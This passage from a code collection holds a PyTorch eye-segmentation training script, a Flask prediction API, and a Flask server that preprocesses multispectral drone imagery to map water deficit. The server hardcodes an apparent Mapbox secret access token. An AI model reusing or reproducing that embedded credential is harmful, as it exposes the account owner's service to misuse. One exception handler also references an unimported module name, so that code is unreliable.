nn.ReLU(inplace=True)\n )\n\n\n\"\"\" InvertedResidual \"\"\"\n\n\nclass InvertedResidual(nn.Module):\n def __init__(self, inp, oup, stride, expand_ratio):\n super(InvertedResidual, self).__init__()\n self.stride = stride\n assert stride in [1, 2]\n\n hidden_dim = int(round(inp * expand_ratio))\n self.use_res_connect = self.stride == 1 and inp == oup\n\n layers = []\n if expand_ratio != 1:\n # pw\n layers.append(ConvBNReLU(inp, hidden_dim, kernel_size=1))\n layers.extend([\n # dw\n ConvBNReLU(hidden_dim, hidden_dim, stride=stride, groups=hidden_dim),\n # pw-linear\n nn.Conv2d(hidden_dim, oup, 1, 1, 0, bias=False),\n nn.BatchNorm2d(oup),\n ])\n self.conv = nn.Sequential(*layers)\n\n def forward(self, x):\n if self.use_res_connect:\n return x + self.conv(x)\n else:\n return self.conv(x)\n\n\nclass Hsigmoid(nn.Module):\n def __init__(self, inplace=True):\n super(Hsigmoid, self).__init__()\n self.inplace = inplace\n\n def forward(self, x):\n return F.relu6(x + 3., inplace=self.inplace) / 6.\n\n\nclass SELayer(nn.Module):\n def __init__(self, channel, reduction=16):\n super(SELayer, self).__init__()\n self.avg_pool = nn.AdaptiveAvgPool2d(1)\n self.fc = nn.Sequential(\n nn.Linear(channel, channel // reduction, bias=False),\n nn.ReLU(inplace=True),\n nn.Linear(channel // reduction, channel, bias=False),\n Hsigmoid()\n # nn.Sigmoid()\n )\n\n def forward(self, x):\n b, c, _, _ = x.size()\n y = self.avg_pool(x).view(b, c)\n y = self.fc(y).view(b, c, 1, 1)\n return x * y.expand_as(x)\n\n\nclass MobileNetV2_CS(nn.Module):\n def __init__(self, num_classes=4, out_shape=(640, 400), width_mult=1.0, inverted_residual_setting=None,\n round_nearest=8):\n \"\"\"\n MobileNet V2 CS main class\n Args:\n num_classes (int): Number of classes\n width_mult (float): Width multiplier - adjusts number of channels in each layer by this amount\n inverted_residual_setting: Network structure\n round_nearest (int): Round the number of channels in each layer to be a multiple of this number\n Set to 1 to turn off rounding\n \"\"\"\n super(MobileNetV2_CS, self).__init__()\n block = InvertedResidual\n input_channel = 32\n self.out_shape = out_shape\n if inverted_residual_setting is None:\n inverted_residual_setting = [\n # t, c, n, s\n [1, 16, 2, 1],\n [6, 24, 3, 2],\n [6, 32, 4, 2],\n ]\n\n # only check the first element, assuming user knows t,c,n,s are required\n if len(inverted_residual_setting) == 0 or len(inverted_residual_setting[0]) != 4:\n raise ValueError(\"inverted_residual_setting should be non-empty \"\n \"or a 4-element list, got {}\".format(inverted_residual_setting))\n\n # building first layer\n input_channel = _make_divisible(input_channel * width_mult, round_nearest)\n\n features = [ConvBNReLU(1, input_channel, stride=2)] # 3 for color image\n\n # building inverted residual blocks\n for t, c, n, s in inverted_residual_setting:\n output_channel = _make_divisible(c * width_mult, round_nearest)\n for i in range(n):\n stride = s if i == 0 else 1\n features.append(block(input_channel, output_channel, stride, expand_ratio=t))\n input_channel = output_channel\n\n # building last several layers\n kn_size = 3\n features.append(ConvReLU(input_channel, 64, kernel_size=kn_size))\n\n self.features = nn.Sequential(*features)\n \n # building segmentation layer\n c_segmentation = [64, num_classes]\n\n segmentation_part1 = [ConvReLU(c_segmentation[0], c_segmentation[0], kernel_size=1),\n nn.Upsample(scale_factor=4.0, mode='bilinear',\n align_corners=False)]\n\n up_part1 = [ConvReLU(c_segmentation[0], c_segmentation[1], 
kernel_size=1),\n nn.Upsample(scale_factor=4.0, mode='bilinear', align_corners=False),\n SELayer(channel=c_segmentation[1], reduction=4)]\n\n self.up_part1 = nn.Sequential(*up_part1)\n\n conv_up = [ConvReLU(c_segmentation[0], c_segmentation[1], kernel_size=kn_size),\n ConvReLU(c_segmentation[1], c_segmentation[1], kernel_size=kn_size),\n ConvReLU(c_segmentation[1], c_segmentation[1], kernel_size=kn_size),\n nn.Upsample(scale_factor=4.0, mode='bilinear', align_corners=False)]\n self.conv_up_part1 = nn.Sequential(*conv_up)\n\n self.segm_part1 = nn.Sequential(*segmentation_part1)\n\n # weight initialization\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out')\n if m.bias is not None:\n nn.init.zeros_(m.bias)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.ones_(m.weight)\n nn.init.zeros_(m.bias)\n\n def forward(self, x):\n x = self.features(x)\n\n x1 = self.segm_part1(x)\n\n x1_seg = self.conv_up_part1(x1)\n\n x1_up = self.up_part1(x1)\n\n x = x1_seg + x1_up\n \n x_softmax = F.softmax(x, dim=1)\n sgm = torch.argmax(x_softmax, dim=1)\n return x_softmax, sgm\n\n\ndef weighted_CrossEntropyLoss(output, target, device, n_classes=4):\n \"\"\" Weighted Cross Entropy Loss\"\"\"\n n_pixel = target.numel()\n _, counts = torch.unique(target, return_counts=True)\n cls_weight = torch.div(n_pixel, n_classes * counts.type(torch.FloatTensor)).to(device)\n loss = F.cross_entropy(output, target, weight=cls_weight)\n\n return loss\n\n\ndef get_mean_std(data_loader, device):\n \"\"\" Get mean, std of data_loader \"\"\"\n print('Calculating mean, std ...')\n cnt = 0\n fst = torch.empty(3).to(device) # 0\n snd = torch.empty(3).to(device) # 0\n for i_batch, sample_batched in enumerate(tqdm(data_loader)):\n img_batch = sample_batched['image'].to(device)\n b, c, h, w = img_batch.shape\n nb_pixels = b * h * w\n sum_ = torch.sum(img_batch, dim=[0, 2, 3])\n sum_of_square = torch.sum(torch.pow(img_batch, 2.0), dim=[0, 2, 3])\n fst = (sum_ + cnt * fst) / (nb_pixels + cnt)\n snd = (sum_of_square + cnt * snd) / (nb_pixels + cnt)\n\n cnt += nb_pixels\n\n return fst, torch.sqrt(snd - torch.pow(fst, 2.0))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Eye Segmentation - SGD/SWA training')\n parser.add_argument('--dir', type=str, default=None, required=True, help='training directory (default: None)')\n parser.add_argument('--opt', type=str, default=None, required=True, help='Optimizer: Adam or SGD (default: None)')\n parser.add_argument('--batch_size', type=int, default=32, metavar='N', help='input batch size (default: 128)')\n parser.add_argument('--num_workers', type=int, default=4, metavar='N', help='number of workers (default: 4)')\n parser.add_argument('--resume', type=str, default=None, metavar='CKPT',\n help='checkpoint to resume training from (default: None)')\n parser.add_argument('--epochs', type=int, default=200, metavar='N', help='number of epochs to train (default: 200)')\n parser.add_argument('--save_freq', type=int, default=25, metavar='N', help='save frequency (default: 25)')\n parser.add_argument('--eval_freq', type=int, default=5, metavar='N', help='evaluation frequency (default: 5)')\n parser.add_argument('--lr_init', type=float, default=0.1, metavar='LR',\n help='initial learning rate (default: 0.01)')\n parser.add_argument('--momentum', type=float, default=0.9, metavar='M', help='SGD momentum (default: 0.9)')\n parser.add_argument('--wd', type=float, default=1e-4, help='weight decay (default: 1e-4)')\n 
parser.add_argument('--swa', action='store_true', help='swa usage flag (default: off)')\n parser.add_argument('--swa_start', type=float, default=161, metavar='N',\n help='SWA start epoch number (default: 161)')\n parser.add_argument('--swa_lr', type=float, default=0.0005, metavar='LR', help='SWA LR (default: 0.05)')\n parser.add_argument('--seed', type=int, default=1, metavar='S', help='random seed (default: 1)')\n args = parser.parse_args()\n\n #experiment = Experiment(project_name='OpenEDS_MODIFIED', api_key='',\n # auto_output_logging='simple',\n # disabled=False)\n\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n print('Preparing directory %s' % args.dir)\n os.makedirs(args.dir, exist_ok=True)\n with open(os.path.join(args.dir, 'command.sh'), 'w') as f:\n f.write(' '.join(sys.argv))\n f.write('\\n')\n #f.write(experiment.get_key())\n f.write('\\n')\n\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n torch.manual_seed(args.seed)\n torch.cuda.manual_seed(args.seed)\n np.random.seed(args.seed)\n random.seed(args.seed)\n\n print('Loading dataset. ', str(datetime.datetime.now()))\n # root_path = './Semantic_Segmentation_Dataset/'\n if os.name == 'nt':\n root_path = 'C:/Semantic_Segmentation_Dataset/'\n else:\n root_path = './Semantic_Segmentation_Dataset/'\n\n cfg = dict()\n cfg['batch_size'] = 64\n\n cfg['scale'] = 0.5\n # Original, mean 0.4679, std 0.2699\n # Gamma correction: mean 0.3977, std 0.2307\n if cfg['scale'] == 0.5:\n mnet_v2_mean = [0.4679]\n mnet_v2_std = [0.2699]\n else:\n mnet_v2_mean = [0.4679]\n mnet_v2_std = [0.2699]\n\n train_set = OpenEDS(root_path=root_path + 'train',\n transform=transforms.Compose(\n [Rescale(cfg['scale']), Brightness(brightness=(0.5, 2.75)), ToTensor(),\n Normalize(mnet_v2_mean, mnet_v2_std)]))\n\n val_set = OpenEDS(root_path=root_path + 'validation',\n transform=transforms.Compose(\n [Rescale(cfg['scale']), ToTensor(), Normalize(mnet_v2_mean, mnet_v2_std)])) #\n\n test_set = OpenEDS(root_path=root_path + 'test',\n transform=transforms.Compose(\n [Rescale(cfg['scale']), ToTensor(), Normalize(mnet_v2_mean, mnet_v2_std)])) #\n\n loaders = {'train': torch.utils.data.DataLoader(train_set, batch_size=args.batch_size, shuffle=True,\n num_workers=args.num_workers, pin_memory=True),\n 'val': torch.utils.data.DataLoader(val_set, batch_size=args.batch_size, shuffle=False,\n num_workers=args.num_workers, pin_memory=True),\n 'test': torch.utils.data.DataLoader(test_set, batch_size=args.batch_size, shuffle=False,\n num_workers=args.num_workers, pin_memory=True)\n }\n\n\n model = MobileNetV2_CS()\n model.to(device)\n criterion = utils.generalised_dice_loss_ce # weighted_CrossEntropyLoss\n if args.opt == 'sgd':\n optimizer = torch.optim.SGD(model.parameters(), lr=args.lr_init, momentum=args.momentum, weight_decay=args.wd)\n elif args.opt == 'adam':\n optimizer = torch.optim.Adam(model.parameters(), lr=args.lr_init, weight_decay=args.wd)\n torchsummary.summary(model, (1, 320, 200))\n\n\n def schedule(epoch):\n t = (epoch) / (args.swa_start if args.swa else args.epochs)\n lr_ratio = args.swa_lr / args.lr_init if args.swa else 0.01\n if args.lr_init > 5e-1:\n t_threshold = 0.16\n # elif args.lr_init > 1e-3:\n # t_threshold = 0.4\n else:\n t_threshold = 0.5\n if t <= t_threshold:\n factor = 1.0\n elif t <= 0.9:\n factor = 1.0 - (1.0 - lr_ratio) * (t - t_threshold) / (t_threshold - 0.1)\n if factor <= 0:\n factor = lr_ratio\n else:\n factor = lr_ratio\n return args.lr_init * factor\n\n\n if 
args.swa:\n print('SWA training')\n steps_per_epoch = len(loaders['train'].dataset) / args.batch_size\n steps_per_epoch = int(steps_per_epoch)\n print(\"Steps per epoch:\", steps_per_epoch)\n optimizer = torchcontrib.optim.SWA(optimizer, swa_start=args.swa_start * steps_per_epoch,\n swa_freq=steps_per_epoch, swa_lr=args.swa_lr)\n else:\n print('Original training')\n\n start_epoch = 0\n if args.resume is not None:\n print('Resume training from {}'.format(args.resume))\n checkpoint = torch.load(args.resume)\n start_epoch = checkpoint['epoch']\n model.load_state_dict(checkpoint['state_dict'])\n optimizer.load_state_dict(checkpoint['optimizer'])\n\n columns = ['ep', 'lr', 'tr_loss', 'tr_acc', 'tr_mIOU', 'val_loss', 'val_acc', 'val_mIOU', 'time']\n if args.swa:\n columns = columns[:-1] + ['swa_val_loss', 'swa_val_acc', 'swa_val_mIOU'] + columns[-1:]\n swa_res = {'loss': None, 'accuracy': None, 'mIOU': None}\n\n utils.save_checkpoint(\n args.dir,\n start_epoch,\n state_dict=model.state_dict(),\n optimizer=optimizer.state_dict()\n )\n\n if args.resume is not None:\n if args.swa:\n optimizer.swap_swa_sgd()\n\n \"\"\" Training \"\"\"\n for epoch in range(start_epoch, args.epochs):\n time_ep = time.time()\n\n lr = schedule(epoch)\n\n utils.adjust_learning_rate(optimizer, lr)\n train_res = utils.train_epoch(loaders['train'], model, criterion, optimizer)\n #experiment.log_metric(\"learning_rate\", lr)\n\n # Log train_res\n #with experiment.train():\n # experiment.log_metrics(train_res, step=epoch)\n\n if epoch == 0 or epoch % args.eval_freq == args.eval_freq - 1 or epoch == args.epochs - 1:\n val_res = utils.eval(loaders['val'], model, criterion, viz='val_{}'.format(epoch + 1))\n # Log val_res\n #with experiment.validate():\n # experiment.log_metrics(val_res, step=epoch)\n else:\n val_res = {'loss': None, 'accuracy': None, 'mIOU': None}\n\n if args.swa and (epoch + 1) >= args.swa_start:\n if epoch == 0 or epoch % args.eval_freq == args.eval_freq - 1 or epoch == args.epochs - 1:\n # Batchnorm update\n print('BatchNorm Update')\n optimizer.swap_swa_sgd()\n optimizer.bn_update(loaders['train'], model, device)\n swa_res = utils.eval(loaders['val'], model, criterion, viz='swa_val_{}'.format(epoch + 1))\n\n if (epoch + 1) % args.save_freq == 0 or epoch == args.epochs - 1:\n utils.save_checkpoint(\n args.dir,\n epoch + 1,\n state_dict=model.state_dict(),\n optimizer=optimizer.state_dict()\n )\n\n optimizer.swap_swa_sgd()\n #with experiment.validate():\n swa_res_log = {'swa_loss': swa_res['loss'], 'swa_accuracy': swa_res['accuracy'],\n 'swa_mIOU': swa_res['mIOU']}\n # experiment.log_metrics(swa_res_log, step=epoch)\n else:\n swa_res = {'loss': None, 'accuracy': None, 'mIOU': None}\n\n if (epoch + 1) % args.save_freq == 0:\n if args.swa is None or (args.swa and (epoch + 1) < args.swa_start):\n utils.save_checkpoint(\n args.dir,\n epoch + 1,\n state_dict=model.state_dict(),\n optimizer=optimizer.state_dict()\n )\n\n time_ep = time.time() - time_ep\n values = [epoch + 1, lr, train_res['loss'], train_res['accuracy'], train_res['mIOU'], val_res['loss'],\n val_res['accuracy'], val_res['mIOU'], time_ep]\n if args.swa:\n values = values[:-1] + [swa_res['loss'], swa_res['accuracy'], swa_res['mIOU']] + values[-1:]\n\n table = tabulate.tabulate([values], columns, tablefmt='simple', floatfmt='10.6f')\n if epoch % 40 == 0:\n table = table.split('\\n')\n table = '\\n'.join([table[1]] + table)\n else:\n table = table.split('\\n')[2]\n print(table)\n \"\"\" End of Training \"\"\"\n\n print('End of training, ', 
str(datetime.datetime.now()))\n\n #experiment.end()\n" } ]
4
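The record above trains its segmentation network with the `generalised_dice_loss_ce` criterion from `src/utils.py`, which weights every class by inverse pixel frequency before computing the Dice overlap. Below is a minimal standalone sketch of that weighting scheme, not the repository's exact function: it assumes softmax probabilities of shape (N, C, H, W) and integer labels of shape (N, H, W), and it uses `torch.bincount` with `minlength` so the weight vector stays aligned with class indices even when a class is absent from a batch (something `torch.unique(return_counts=True)`, as used in the payload, does not guarantee).

```python
import torch
import torch.nn.functional as F

def generalised_dice_loss(probs, target, n_classes=4, eps=1e-6):
    # Inverse-frequency class weights: n_pixels / (n_classes * count_c).
    counts = torch.bincount(target.flatten(), minlength=n_classes).float()
    weights = target.numel() / (n_classes * counts.clamp(min=1.0))

    # One-hot encode the labels to match the (N, C, H, W) prediction tensor.
    one_hot = F.one_hot(target.long(), n_classes).permute(0, 3, 1, 2).float()

    intersect = (probs * one_hot).sum(dim=(2, 3))            # (N, C)
    union = probs.sum(dim=(2, 3)) + one_hot.sum(dim=(2, 3))  # (N, C)

    numerator = (weights * intersect).sum(dim=1)
    denominator = (weights * union).sum(dim=1).clamp(min=eps)
    return (1.0 - 2.0 * numerator / denominator).mean()

# Dummy usage with random predictions and labels.
probs = F.softmax(torch.randn(2, 4, 64, 80), dim=1)
labels = torch.randint(0, 4, (2, 64, 80))
print(generalised_dice_loss(probs, labels).item())
```

This mirrors the payload's `type_weight='simple'` branch; its `'square'` variant simply squares the weights before the same computation.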
mhorndev/wgu-c964-backend
https://github.com/mhorndev/wgu-c964-backend
8c65cfea3477d1077a2e92e13bb5901e708f2cba
fc38da4cf9abc5dbf5e4a9b72ec00f02f9db0994
8eae9b2eba2a43b1065c795696040e98172217e4
refs/heads/master
2023-03-05T09:54:52.876085
2021-02-13T05:53:43
2021-02-13T05:53:43
337,913,269
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.8611111044883728, "alphanum_fraction": 0.8611111044883728, "avg_line_length": 8.25, "blob_id": "fe79726440fef04b78ece3dc1805ad69d65af7db", "content_id": "902588d3b0fc83f455321c235af357868f9489bc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 36, "license_type": "no_license", "max_line_length": 12, "num_lines": 4, "path": "/requirements.txt", "repo_name": "mhorndev/wgu-c964-backend", "src_encoding": "UTF-8", "text": "flask\npandas\nscikit-learn\nflask-cors" }, { "alpha_fraction": 0.6435786485671997, "alphanum_fraction": 0.6565656661987305, "avg_line_length": 21.354839324951172, "blob_id": "fb9c5377c7c5856a39661f4c5deb5df6c8659994", "content_id": "6058af72387a7c29420b44f9eba9d22ad9e99f0f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 693, "license_type": "no_license", "max_line_length": 53, "num_lines": 31, "path": "/app.py", "repo_name": "mhorndev/wgu-c964-backend", "src_encoding": "UTF-8", "text": "from flask import Flask, request, jsonify\nfrom flask_cors import CORS\nimport os\nimport pandas\nimport pickle\n\napp = Flask(__name__)\nCORS(app)\n\nmodel = pickle.load(open('model.pkl','rb'))\n\[email protected]('/', methods=['POST'])\n\ndef post():\n # read request body\n data = request.get_json(force=True)\n\n # convert request body into a dataframe\n data.update((x, [y]) for x, y in data.items())\n dataframe = pandas.DataFrame.from_dict(data)\n\n # predictions\n prediction = model.predict(dataframe)\n \n # return data\n return jsonify(cost=int(prediction[0]))\n\nport = int(os.environ.get('PORT', 8080))\n\nif __name__ == '__main__':\n app.run(threaded=True, host='0.0.0.0', port=port)\n" } ]
2
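The `app.py` payload above exposes a single POST endpoint that wraps each JSON value in a list, builds a one-row DataFrame, and returns the model's prediction as `{"cost": ...}`. A hypothetical client call is sketched below; the feature names are placeholders, since the real column names depend on what `model.pkl` was trained on.

```python
import requests

# Hypothetical feature names; the real ones must match model.pkl's training columns.
payload = {"age": 30, "bmi": 27.5, "children": 1}

# app.py defaults to port 8080 unless the PORT environment variable overrides it.
resp = requests.post("http://localhost:8080/", json=payload)
print(resp.json())  # e.g. {"cost": 12345}
```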
MioHTT/projetFriendlyFruit
https://github.com/MioHTT/projetFriendlyFruit
5b0f7241a7cb45029c4b2e267ec5420792cf52ef
3545d7b76e72f85336abc39d5a716368bf7679a4
cc736375ef74b75643681373dbe9b374e04999da
refs/heads/master
2022-12-12T20:08:32.175675
2020-09-15T09:13:28
2020-09-15T09:13:28
295,366,778
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5016666650772095, "alphanum_fraction": 0.7016666531562805, "avg_line_length": 16.14285659790039, "blob_id": "8b1930ffc73d628b2b97984dbaba0c05bda8f884", "content_id": "2e8b6eb9b894b9281d5de5703b95962741f74091", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 1200, "license_type": "no_license", "max_line_length": 35, "num_lines": 70, "path": "/installation/requirements.txt", "repo_name": "MioHTT/projetFriendlyFruit", "src_encoding": "UTF-8", "text": "absl-py==0.9.0\naltgraph==0.17\nastunparse==1.6.3\ncachetools==4.1.0\ncertifi==2020.4.5.2\nchardet==3.0.4\nclick==6.6\ncycler==0.10.0\ndecorator==4.4.2\ndill==0.3.2\nFlask==0.11.1\ngast==0.3.3\ngeographiclib==1.50\ngeojson==1.3.3\ngoogle-auth==1.18.0\ngoogle-auth-oauthlib==0.4.1\ngoogle-pasta==0.2.0\ngrpcio==1.29.0\nh5py==2.10.0\nidna==2.9\nimageio==2.8.0\nimportlib-metadata==1.6.1\nitsdangerous==0.24\nJinja2==2.8\njoblib==0.15.1\nKeras-Preprocessing==1.1.2\nkiwisolver==1.2.0\nMarkdown==3.2.2\nMarkupSafe==0.23\nmatplotlib==3.2.1\nmlxtend==0.17.3\nmultiprocess==0.70.10\nnetworkx==2.4\nnumpy==1.18.5\noauthlib==3.1.0\nopencv-python==4.2.0.34\nopt-einsum==3.2.1\npackaging==20.4\npandas==1.0.4\nPillow==7.1.2\nprotobuf==3.12.2\npyasn1==0.4.8\npyasn1-modules==0.2.8\npyparsing==2.4.7\npython-dateutil==2.8.1\npytz==2020.1\nPyWavelets==1.1.1\nrequests==2.11.1\nrequests-oauthlib==1.3.0\nrsa==4.6\nscikit-image==0.17.2\nscikit-learn==0.23.1\nscipy==1.4.1\nseaborn==0.10.1\nShapely==1.7.0\nsip==5.3.0\nsix==1.15.0\nsklearn==0.0\ntensorboard==2.2.2\ntensorboard-plugin-wit==1.6.0.post3\ntensorflow==2.2.0\ntensorflow-estimator==2.2.0\ntermcolor==1.1.0\nthreadpoolctl==2.1.0\ntifffile==2020.6.3\ntoml==0.10.1\nurllib3==1.25.9\nWerkzeug==1.0.1\nwrapt==1.12.1\nzipp==3.1.0\n" }, { "alpha_fraction": 0.5652173757553101, "alphanum_fraction": 0.613043487071991, "avg_line_length": 19.909090042114258, "blob_id": "c30f9fb0bae297520c4f65a7ada2066b22b4e34d", "content_id": "b17334ec40a43c4153817b3adba84837a54cc1dc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 230, "license_type": "no_license", "max_line_length": 63, "num_lines": 11, "path": "/installation/run.cpp", "repo_name": "MioHTT/projetFriendlyFruit", "src_encoding": "UTF-8", "text": "#include <iostream>\n\nint main() {\n system(\"start http://127.0.0.1:5000\");\n //installer \n system(\n \"installation\\\\venvFriendlyFruit\\\\Scripts\\\\activate.bat &&\"\n \"python flask_mapbox\\\\server.py\"\n );\n return 0;\n}\n" }, { "alpha_fraction": 0.6276929974555969, "alphanum_fraction": 0.6511788964271545, "avg_line_length": 41.413726806640625, "blob_id": "6cc4db05cd814d7c178caaba8aa24a3fcedf69f6", "content_id": "ccdccd83adac3e7e1f230628d11ea53f7baf7242", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 21657, "license_type": "no_license", "max_line_length": 162, "num_lines": 510, "path": "/flask_mapbox/server.py", "repo_name": "MioHTT/projetFriendlyFruit", "src_encoding": "UTF-8", "text": "import os\nimport pandas as pd\nfrom skimage import io\nimport numpy as np \nfrom tensorflow.keras.models import load_model\n\nfrom flask import Flask, request, session, g, redirect, \\\n url_for, abort, render_template, flash, Response\n\n\nimport os\nimport tifffile as tiff\nimport numpy as np \nfrom shutil import copyfile\nfrom multiprocessing import Pool\nfrom skimage import io\nfrom skimage.transform import resize\nfrom geographiclib.constants 
import Constants\nfrom geographiclib.geodesic import Geodesic\nfrom shapely.ops import unary_union\nfrom shapely.geometry import Polygon\nfrom math import atan, tan, sqrt\nimport gdal\nimport time\nimport random\nimport json\nimport shutil\n\nIMG_HEIGHT_RAW = 512\nIMG_WIDTH_RAW = 640\nIMG_HEIGHT_16 = 128\nIMG_WIDTH_16 = 160\nNB_CHANNELS = 7\n\n#architecture du projet \nbaseFolder = \"../data/preprocessing/\"\nclippedImagesFolder = '../data/preprocessing/clippedImages/16/'\ndatasetFolder = '../data/images/'\ncoordsFilePath = \"../data/preprocessing/imagesCoords.csv\"\nresizedImagesFolder = \"../data/preprocessing/resizedImages/\"\nstackedImagesFolder = \"../data/preprocessing/stackedImages/\" \nmodelPath = \"../data/model/model_WD.h5\"\n\n# variables globales d'avancement des traitements\nclipDone = False\nwritingDone = False\npredictProgress = 0\n\n#configuration de flask\napp = Flask(__name__)\napp.config.from_object(__name__)\napp.config.from_envvar('APP_CONFIG_FILE', silent=True)\nMAPBOX_ACCESS_KEY = 'sk.eyJ1IjoiZnJpZW5kbHlmcnVpdHMxIiwiYSI6ImNrY3VoazNqeTBqeDkycnQyODlrbXBlZmgifQ.BqVVTNvgJSmxPLx7bV6JWA'\n\n# page des traitements\[email protected]('/')\ndef preprocessing():\n return render_template('preprocessing.html')\n\n# page cherchee a l'activation du bouton de lancement du traitement\[email protected]('/start_over')\ndef start_over():\n clipFolder = '../data/preprocessing/clippedImages/'\n imagesFolder = os.path.join(clippedImagesFolder,'images')\n dirPath = baseFolder\n #suppression des dossiers si il y a eu un traitement precedent\n if os.path.exists(dirPath) and os.path.isdir(dirPath):\n print(dirPath)\n shutil.rmtree(dirPath, ignore_errors=True)\n dirsToCreate = [resizedImagesFolder,stackedImagesFolder,clipFolder,clippedImagesFolder,imagesFolder] \n #cration des dossiers du traitement du projet\n for dirToCreate in dirsToCreate:\n print(dirToCreate)\n os.makedirs(dirToCreate)\n return \"ok\"\n\n#phase de redimensionnement\[email protected]('/resize_img')\ndef resize_img():\n files = [f for f in os.listdir(datasetFolder) if '.tif' in f]\n multibandImages = []\n pool = Pool(3)\n # pour chaque images multispectrale, on la redimensionne, sinon on ajoute l'infrarouge au dossier final\n for file in files:\n if \"nm\" in file:\n multibandImages.append(file)\n else :\n #copie des fichiers aux bonnes dimensions\n copyfile(\n os.path.join(datasetFolder, file),\n os.path.join(resizedImagesFolder, file)\n )\n #parallelisation de la fonction de resize\n pool.map(resizeImages,multibandImages)\n pool.close()\n return str(200)\n\n# fonction de progression du redimensionnement \[email protected]('/progress_resize')\ndef progress_resize():\n resizedFiles = [f for f in os.listdir(resizedImagesFolder) if '.tif' in f]\n files = [f for f in os.listdir(datasetFolder) if '.tif' in f]\n # evaluation des images traitees par rapport au total des images\n return str(int(100 * (len(resizedFiles)/len(files))))\n\n#fonction d empilement des images\[email protected]('/stack_img')\ndef stack_img():\n pool = Pool()\n files = [f for f in os.listdir(datasetFolder) if '.tif' in f]\n imagesToStackArray = []\n while files:\n #on selectionne un index (le numero de chaque image)\n imageIndex = files[0].split('_')[0]\n #on regroupe les differentes bandes par leur numero\n imagesToStack = [image for image in files if imageIndex in image]\n imagesToStack.sort()\n #puis on les supprime de la liste des images restantes\n files = list(set(files) - set(imagesToStack))\n if (len(imagesToStack) == 7):\n 
imagesToStackArray.append(imagesToStack)\n else:\n for imageName in imagesToStack:\n os.remove(os.path.join(resizedImagesFolder,imageName))\n\n pool.map(stackImages,imagesToStackArray)\n pool.close()\n return \"ok\"\n\n#progression des empilements\[email protected]('/progress_stack')\ndef progress_stack():\n\n stackImages = [f for f in os.listdir(stackedImagesFolder) if '.tif' in f]\n resizedFiles = [f for f in os.listdir(resizedImagesFolder) if '.tif' in f]\n # evaluation des images traitees par rapport au total des images\n return str(int(700 * (len(stackImages))/len(resizedFiles)))\n\n\n#fonction de prediction\[email protected]('/prediction')\ndef prediction():\n global writingDone\n #TODO : pretraiter les images pour avoir les .csv correspondants\n imageFolder = os.path.join(clippedImagesFolder,'images')\n #recuperation des images detectees comme OW/WD, ainsi que leurs coordonnees \n areas = getCoords(modelPrediction(imageFolder))\n #affichage de la page html contenant la carte (mapbox)\n f=open(os.path.join(clippedImagesFolder,'areas.txt'),'w')\n f.write(json.dumps(areas))\n f.close()\n writingDone = True\n return \"ok\"\n\n#fonction d affichage de la prediction\[email protected]('/display_prediction')\ndef dispPrediction():\n # chargement des zones de deficit hydrique\n with open(os.path.join(clippedImagesFolder,'areas.txt')) as f:\n areas = json.load(f)\n # rendu de la carte avec les zones hydriques\n return render_template(\n 'mapbox_js.html', \n ACCESS_KEY=MAPBOX_ACCESS_KEY,\n areas = areas\n )\n\ndef resizeImages(imageName):\n try:\n #ratio entre les focales de la bande verte (570nm) et les autres bandes\n focalRatio570 = 0.525000525000525\n #on applique une reduction de la width pour avoir un ratio egal a celui de l'infrarouge\n #puis on resize l'image a la taille de l'infrarouge\n image = tiff.imread(os.path.join(datasetFolder,imageName))\n #transformation en image 16 bits\n image *= 16\n cropped = image\n if (\"570nm\" in imageName):\n greenHeight = len(image)\n greenWidth = len(image[0])\n #on augmente la taille de l'image par le ratio des lentilles focales\n image_resized = np.floor(resize(image, (greenHeight // focalRatio570, greenWidth // focalRatio570),\n anti_aliasing=True,preserve_range=True))\n heightDiff = int((len(image_resized) - greenHeight)/2)\n widthDiff = int((len(image_resized[0]) - greenWidth)/2)\n image = image_resized[heightDiff:(heightDiff + greenHeight), widthDiff:(widthDiff + greenWidth)]\n #decoupage specifique a la position de la camera utilisee\n if (\"450nm\" in imageName): \n cropped = image[8:len(image),110:len(image[0])]\n elif (\"530nm\" in imageName): \n cropped = image[0:len(image) - 10,78:len(image[0])]\n elif (\"570nm\" in imageName): \n cropped = image[80:len(image),138:len(image[0])]\n elif (\"675nm\" in imageName): \n cropped = image[20:len(image),90:len(image[0])]\n elif (\"730nm\" in imageName): \n cropped = image[0:len(image) - 16,72:len(image[0])]\n elif (\"850nm\" in imageName): \n cropped = image[0:len(image) - 45,110:len(image[0])] \n #redimensionnement final \n resized = resize(cropped, (IMG_HEIGHT_RAW,IMG_WIDTH_RAW),preserve_range=True)\n #enregistrement de l image resultante\n tiff.imsave(os.path.join(resizedImagesFolder,imageName),resized.astype(np.uint16))\n except tifffile.tifffile.TiffFileError:\n print(imageName)\n\ndef stackImages(imagesToStack):\n bands_data = []\n #on traite les images selectionnees\n for imageName in imagesToStack[0:7]:\n #on recupère leur bande spectrale\n try :\n image = 
tiff.imread(os.path.join(resizedImagesFolder,imageName))\n except:\n print(imageName)\n bands_data.append(image)\n try :\n #empilement des bandes\n stackedImage = np.dstack((bands_data[0],bands_data[1],bands_data[2],bands_data[3],bands_data[4],bands_data[5],bands_data[6]))\n #enregistrement de l image resultante\n tiff.imsave(os.path.join(stackedImagesFolder,imageName.split('_')[0] + \".tif\"), stackedImage, planarconfig='contig')\n except:\n #si il y a une erreur, on supprime les images associees\n for imageName in imagesToStack[0:7]:\n os.remove(os.path.join(resizedImagesFolder,imageName))\n\n \n#recuperation des coordonnees du coin de l image calculee\ndef getEndpoint(lat1, lon1, d, bearing):\n geod = Geodesic(Constants.WGS84_a, Constants.WGS84_f)\n d = geod.Direct(lat1, lon1, bearing, d)\n return d['lat2'], d['lon2']\n\n#recupere les informations de l'image .tiff\ndef getImageData(imageName):\n\n #dictionnaire des informations de l'image\n imageData = {}\n #ouverture de l'image\n 